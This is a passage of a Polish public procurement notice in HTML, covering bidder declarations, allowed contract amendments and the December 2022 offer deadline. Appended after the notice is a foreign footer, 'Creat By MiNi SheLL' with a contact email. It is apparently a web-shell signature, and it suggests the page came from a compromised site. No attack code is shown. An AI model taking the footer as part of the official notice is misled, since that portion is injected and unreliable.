będzie<br/>potwierdzać brak podstaw do wykluczenia oraz spełnienie warunków udziału w postępowaniu w<br/>zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>Oświadczenie składa się w formie elektronicznej lub w postaci elektronicznej opatrzonej<br/>podpisem zaufanym lub podpisem osobistym;<br/>6) jeżeli oferta Wykonawcy wspólnie ubiegającego się o zamówienie zostanie wybrana,<br/>Zamawiający zażąda, przed zawarciem umowy w sprawie zamówienia publicznego, kopii umowy<br/>regulującej współpracę tych wykonawców; <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Projektowane postanowienia umowy w sprawie zamówienia publicznego, które zostaną wprowadzone do treści tej umowy,<br/>określone zostały w załączniku nr 4 do SWZ Zamawiający, zgodnie z art. 455 ust. 1 ustawy Pzp, przewiduje możliwość<br/>dokonania zmian postanowień zawartej umowy w sprawie zamówienia publicznego, w sposób i na warunkach określonych<br/>w projekcie umowy<br/>1. Zgodnie z treścią art. 455 ust. 1 ustawy Prawo zamówień publicznych Zamawiający przewiduje możliwość dokonania<br/>zmian postanowień zawartej umowy.<br/>2. Dopuszcza się wszelkie nieistotne zmiany, w tym:<br/>a) zmiana danych związana z obsługą administracyjno-organizacyjną umowy (danych teleadresowych Wykonawcy lub<br/>Zamawiającego) – zmiana ta następuje poprzez pisemne zgłoszenie tego faktu drugiej stronie i nie wymaga zawarcia<br/>aneksu do umowy,<br/>b) wystąpienia oczywistych omyłek pisarskich i rachunkowych w treści umowy,<br/>3. Strony dopuszczają zmianę istotnych postanowień umowy w przypadku:<br/>a) zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu<br/>zamówienia,<br/>b) zaistnienie innej, niemożliwej do przewidzenia w momencie zawarcia umowy okoliczności prawnej, ekonomicznej lub<br/>technicznej, za którą żadna ze stron nie ponosi odpowiedzialności, a skutkująca brakiem możliwości wykonania umowy,<br/>c) wystąpienia siły wyższej, rozumianej jako wydarzenie lub okoliczność wyjątkową, nagłą, nieuchronną, o charakterze<br/>nadzwyczajnym, niezależną od stron, której nie można było w racjonalny sposób uniknąć lub zaradzić, mającą wpływ na<br/>realizację umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-12-14 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-12-14 10:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com